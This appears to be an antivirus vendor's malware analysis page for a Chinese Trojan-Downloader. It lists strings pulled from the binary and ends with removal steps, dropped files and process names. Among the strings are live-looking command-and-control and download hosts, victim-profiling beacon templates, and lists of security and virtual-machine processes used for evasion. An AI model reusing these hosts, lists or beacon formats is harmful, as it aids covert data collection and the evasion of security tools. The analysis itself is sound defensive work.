HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\%s
FaviconURLFallback
%s[%d]:%s
Chrome
Mozilla Firefox
Opera
Zihu.exe
QtWeb
SeaMonkey
Mozilla Firefox 29.0.0.0 Nightly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
user32.dll
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
ntdll.dll
kernel32.dll
Wtsapi32.dll
explorer.exe
winlogon.exe
Process token open Error: %u
Lookup Privilege value Error: %u
DuplicateTokenEx Error: %u
CreateProcessAsUser Error: %u
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
collect0.eszju.cn
mac=%s&app=%s&uid=%s&serno=%s&mos=%s&mip=%s&sid=%s
mac=%s&app=%s&uid=%s&serno=%s&sid=%s
mac=X-X-X-X-X-X&serno=%s&mos=%s&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&mifr=%s&sid=%s
F:\pz_git\vendor\inc\Poco/String.h
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
..\..\Src\Common\OperatingSystem.cpp
.d
Please contact to [email protected] for more information.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
X:X:X:X:X:X
dnsapi.dll
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
F:\pz_git\vendor\inc\Poco/SharedPtr.h
F:\pz_git\vendor\inc\Poco/ActiveMethod.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
F:\pz_git\bin\osTip.pdb
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
ShellExecuteW
SetViewportOrgEx
ShellExecuteA
GDI32.dll
SHELL32.dll
VERSION.dll
GetProcessHeap
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WS2_32.dll
IPHLPAPI.DLL
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
MSIMG32.dll
IMM32.dll
GetCPInfo
CreatePipe
RegQueryInfoKeyA
zcÁ
1.2.5
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVPipeImpl@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W2HPAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_WH222PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@AAV?$_Ph@$06@4@AAV?$_Ph@$07@4@@std@@
.?AUDWebBrowserEvents2@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@@2@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_WH222PAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@AAV?$_Ph@$06@4@AAV?$_Ph@$07@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_WHPA_WPA_WPA_WPAF@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAPAUIDispatch@@PAF@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_W3@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@@2@HPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_WPA_W@std@@
.?AV?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAPAUIDispatch@@PAFKPA_W3@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V?$_Bind@$00HQ6AHPAUIWebBrowser2@@PAUIDispatch@@PA_W2HPAF@ZAAV?$_Ph@$00@std@@AAV?$_Ph@$01@4@AAV?$_Ph@$02@4@AAV?$_Ph@$03@4@AAV?$_Ph@$04@4@AAV?$_Ph@$05@4@@std@@$0A@@std@@V?$allocator@V?$_Func_class@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@@2@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@
.?AVCXEventMsg@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_WPA_WHPAF@std@@
.?AV?$_Func_base@HPAUIWebBrowser2@@PAUIDispatch@@PA_W@std@@
.?AVCXWebBrowser@@
.?AVHexEncoder@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe
00000000000000000001
.NTg(
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
>(>2>>>[>
?(?2?>?[?
:&;3;`;\<
5_5
5"505=5}5
1#1*161<1
2#2,252>2
= =$=(=,=)?
?$?.?4?:?@?
0%0U0
9#9'9 9/93979
6h6u6
6$727<7]7[8
8…8F8V8e8
5 656>6`6
0 121;1]1
9!9\9!:<:
> ?2?;?]?
2-3E3}3
3,4044484
3034383
7 7$7(7,70747
< <$<(<,<0<4<
0%0S0b0w0
7 828;8]8
; ;$;(;,;0;4;
; ;$;(;,;0;4;8;
1(1,1014181<1@1
6$6,686\6
3(343<3\3
4,484@4`4
5 5(505<5`5
:$:,:8:\:
2 242<2\2
: :@:\:`:|:
XImage_LoadFile("%s"),
(%d),XC_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON,ID(%d),bShow(%d)
(%d),XC_RADIO,ID(%d),bShow(%d)
(%d),XC_CHECK,ID(%d),bShow(%d)
(%d),XC_EDIT,ID(%d),bShow(%d)
(%d),XC_RICHEDIT,ID(%d),bShow(%d)
(%d),XC_COMBOBOX,ID(%d),bShow(%d)
(%d),XC_SCROLLBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)
(%d),XC_LIST,ID(%d),bShow(%d)
(%d),XC_LISTBOX,ID(%d),bShow(%d)
(%d),XC_TREE,ID(%d),bShow(%d)
(%d),XC_MENUBAR,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)
(%d),XC_SLIDERBAR,ID(%d),bShow(%d)
(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)
(%d),XC_TOOLBAR,ID(%d),bShow(%d)
(%d),XC_STATIC,ID(%d),bShow(%d)
(%d),XC_GROUPBOX,ID(%d),bShow(%d)
(%d),XC_PICTURE,ID(%d),bShow(%d)
(%d),XC_MONTHCAL,ID(%d),bShow(%d)
(%d),XC_DATETIME,ID(%d),bShow(%d)
(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)
(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)
(%d),XC_OUTLOOK,ID(%d),bShow(%d)
(%d),XC_TEXTLINK,ID(%d),bShow(%d)
(%d),XC_TABBAR,ID(%d),bShow(%d)
(%d),XC_GIF,ID(%d),bShow(%d)
(%d),XC_EDITFILE,ID(%d),bShow(%d)
(%d),XC_LISTVIEW,ID(%d),bShow(%d)
(%d),XC_PANE,ID(%d),bShow(%d)
(%d),XC_DRAGBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)
(%d),XC_CAPTION,ID(%d),bShow(%d)
(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)
(%d),XC_PIER,ID(%d),bShow(%d)
(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)
(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)
(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)
(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)
(%d),XC_TREE_SUPER,ID(%d),bShow(%d)
left:%d , top:%d , right:%d , bottom:%d
T.png
:[%s]!
title=%s
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
portuguese-brazilian
USER32.DLL
combase.dll
Tadvapi32.dll
res://ieframe.dll/navcancl.htm#
iframe.htm
ID:%d
ID:%d,
/OPENURL:
osmsg
32:HKEY_CURRENT_USER\Software\%s\actv;64:HKEY_CURRENT_USER\Software\%s\actv
HKEY_CURRENT_USER\Software\%s\actv
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
tmpData.ini
swapfile.ini
tEXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
%s %s
hXXp://down.eszju.cn/%s
hXXp://down.eszju.cn/
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
"%s" %s
hXXp://1111.ip138.com/ic.asp
hXXp://ip.chinaz.com/?IP=
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ant=%d&ip=%s&lpn=%s&osrt=%d&inbar=%d&vm=%d&area=%d&sid=%s&ost=%s&hid=%s&geo=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ip=%s&fht=%d&olt=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&ost=%s&hid=%s&ver=%s&ant=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&rt=%d&fr=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sil=%d&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&aplst=
smac=X-X-X-X-X-X&app=%s&uid=%s&rson=%d&msg=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&adid=%d&ver=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s
mac=X-X-X-X-X-X&app=%s&uid=%s&sid=%s&geo=%s
edddddd
Mddddd
VBoxService.exe
VBoxTray.exe
VMwareUser.exe
VMUpgradeHelper.exe
VMwareTray.exe
vmacthlp.exe
vmtoolsd.exe
BaiduAn.exe
ekrn.exe
360sd.exe
BaiduSd.exe
360Safe.exe
360rp.exe
avguard.exe
360tray.exe
avgui.exe
avp.exe
BavSvc.exe
QQPCTray.exe
QQPCRTP.exe
kxescore.exe
KMService.exe
ksafe.exe
kxetray.exe
KSafeTray.exe
KSafeSvc.exe
KWatch.exe
KAVStart.exe
VPTray.exe
KMailMon.exe
Portuguese(Brazilian)
Portuguese(Standard)
yqsclient.exe
:puwin.exe
barrms.exe
Pubwin.exe
TLnbLdr.exe
BarClientView.exe
rwyNCMc.exe
eyoorun.exe
hintclinet.exe
PubwinClient.exe
clsmn.exe
fzclient.exe
mpclient.exe
recreation.exe
wxsyncli.exe
b\*.*
d\
Portugal
Turkey
Explorer.EXE
X\Explorer.Exe
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
\\.\PHYSICALDRIVE%d
HARDWARE\DEVICEMAP\Scsi\Scsi Port %d\Scsi Bus %d\Target Id 0\Logical Unit Id 0
1.0.0.55

nsf2A.tmp_236:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
WinHttpCrackUrl
HttpOpenRequestW
HttpSendRequestW
RegOpenKeyExW
RegCloseKey
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegQueryInfoKeyW
RegDeleteKeyW
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
GetCPInfo
.?AV?$_Ref_count_del@UHKEY__@@V<lambda3>@?A0xbc587dca@utils@@@tr1@std@@
.?AV?$_Ref_count_del@UHKEY__@@V<lambda1>@?A0xbc587dca@utils@@@tr1@std@@
333%%Ìcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf2A.tmp
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1 20262=2
2&2 21282
5 5$5(5,5054585<5
= =$=(=,=
> >$>(>,>|>
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
wUser32.dll
Kernel32.dll
User32.dll
Gdi32.dll
WUser32.dll
lWinHttp.dll
eWinInet.dll
WinInet.dll
eKernel32.dll
WKernel32.dll
eUser32.dll
Advapi32.dll
sKernel32.dll
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\ProductName
tKernel32.dll
utils::ExecWait
dKernel32.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nss15.tmp:2748
    nss15.tmp:2668
    HY2F7WRL5V.exe:568
    AutoTime_51477.exe:4032
    win.exe:484
    AutoTime_51477.tmp:4080
    nsl1E.tmp:2172
    idscservice.exe:1368
    nsjB.tmp:1568
    %original file name%.exe:1756
    nsk1B.tmp:2824
    nsk1B.tmp:3456
    nsk1B.tmp:3440
    nsk1B.tmp:2856
    nsb10.tmp:2136
    qnsm13.tmp:2596
    qnsm13.tmp:2588
    testversion.exe:820
    osmsg.exe:2332
    regsvr32.exe:508
    hp.exe:2404
    nst25.tmp:3184
    mofcomp.exe:2556
    nst18.tmp:2976
    tiantianwifi.exe:2436

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

    %Program Files%\SpaceSoundPro\SpaceSoundPro.dll (37993 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\Uninstall.lnk (734 bytes)
    %Documents and Settings%\%current user%\Desktop\SpaceSoundPro.lnk (742 bytes)
    %Program Files%\SpaceSoundPro\SpaceSoundPro.exe (87303 bytes)
    %Program Files%\SpaceSoundPro\silentconfigurator.exe (5215 bytes)
    %Program Files%\SpaceSoundPro\silentunconfigurator.exe (3502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
    %Program Files%\SpaceSoundPro\Uninstall.exe (1328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISpcre.dll (6382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\AccessControl.dll (13 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\SpaceSoundPro 1.0\SpaceSoundPro.lnk (754 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-911CL.tmp\AutoTime_51477.tmp (6356 bytes)
    %Program Files%\Caster\Uninstaller.exe (8008 bytes)
    %Program Files%\Caster\wizzcaster.exe (39028 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\HelpTool.dll (10815 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\AutoTime.exe (23811 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-KS1NL.tmp\_isetup\_RegDLL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Application Data\UPUpdata\AutoTime_51477.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ui.dll (70 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\testversion.exe (245098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX\win.exe (13484 bytes)
    %Program Files%\SpaceSoundPro\config.conf (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (37949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\KillProcDLL.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\nsb10.tmp (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nspF.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsuC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk1C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\AutoTime51477[1].exe (56936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ttwifi[1].exe (74423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv1D.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M1S3MVKB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk1B.tmp (74423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb7.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsmA.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BQM9LXCC\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe (15904 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss15.tmp (347970 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst18.tmp (15904 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
